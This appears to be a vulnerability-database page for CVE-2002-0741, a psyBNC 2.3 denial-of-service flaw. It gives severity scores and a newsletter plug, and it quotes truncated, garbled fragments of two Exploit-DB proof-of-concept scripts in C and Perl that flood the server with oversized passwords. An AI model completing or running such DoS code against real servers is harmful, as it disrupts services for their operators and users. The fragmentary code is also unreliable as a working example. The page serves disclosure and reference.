CVE-2002-0741
published 2002-08-12CVE-2002-0741: psyBNC 2.3 allows remote attackers to cause a denial of service (CPU consumption and resource exhaustion) by sending a PASS command with a long password…
PriorityP421medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
7.99%
94.0th percentile
psyBNC 2.3 allows remote attackers to cause a denial of service (CPU consumption and resource exhaustion) by sending a PASS command with a long password argument and quickly killing the connection, which is not properly terminated by psyBNC.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| psychoid | psybnc | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
psyBNC 2.3 - Denial of Service
exploitdb·2002-05-19
CVE-2002-0741 psyBNC 2.3 - Denial of Service
psyBNC 2.3 - Denial of Service
---
/*
* psyBNC
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 9000
#define PORT 31337
#define USER "pr0ix"
int senddos(int port, int size, char *target, char *user);
int checkvuln(char *rxbuf);
int testvuln(int port, char *target);
unsigned long resolvenametoip(char *name);
void usage(char *prog);
int checked = 0;
int force;
int main(int argc, char *argv[])
{
int c, i, z;
int port, size, times;
int u_t = 0, d_t = 0, n_t = 0, p_t = 0, s_t = 0, t_t;
char target[1024], *user;
printf("[+] ES psyBNC 0) {
vuln_t = 1;
}
if ((int)(bnc[8] - '0') h_addr);
}
return addr;
}
void usage(char *prog)
{
printf("usage: %s [options]\n", prog);
printf("\t-d Server hosting psybnc [REQUIRED]\n");
printf("\t-f force Skip vuln
Exploit-DB
psyBNC 2.3 - Oversized Passwords Denial of Service
exploitdb·2002-04-22
CVE-2002-0741 psyBNC 2.3 - Oversized Passwords Denial of Service
psyBNC 2.3 - Oversized Passwords Denial of Service
---
source: https://www.securityfocus.com/bid/4570/info
PsyBNC is a freely available, open source IRC bouncing server. It is available for the UNIX and Linux operating systems.
Under some circumstances, it is possible for a remote user to crash a vulnerable server. Upon connection to a vulnerable system, if a user sends a password of 9000 or more characters, and disconnects from the system, the server process does not die. Instead, the process continues to live and consume a large amount of resources.
#!/usr/bin/perl
#PsyBNC 2.3 Remote DDOS POC
#By DVDMAN ([email protected])
#WWW.L33TSECURITY.COM
#L33T SECURITY
use Getopt::Std;
use IO::Socket;
$|=1;
my %options;
getopt('Hhp',\%options);
$arg2 = shift(@ARGV);
$options{h} && u
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2002-04/0322.htmlhttp://online.securityfocus.com/archive/1/269131http://www.iss.net/security_center/static/8912.phphttp://www.securityfocus.com/bid/4570http://archives.neohapsis.com/archives/bugtraq/2002-04/0322.htmlhttp://online.securityfocus.com/archive/1/269131http://www.iss.net/security_center/static/8912.phphttp://www.securityfocus.com/bid/4570
2002-08-12
Published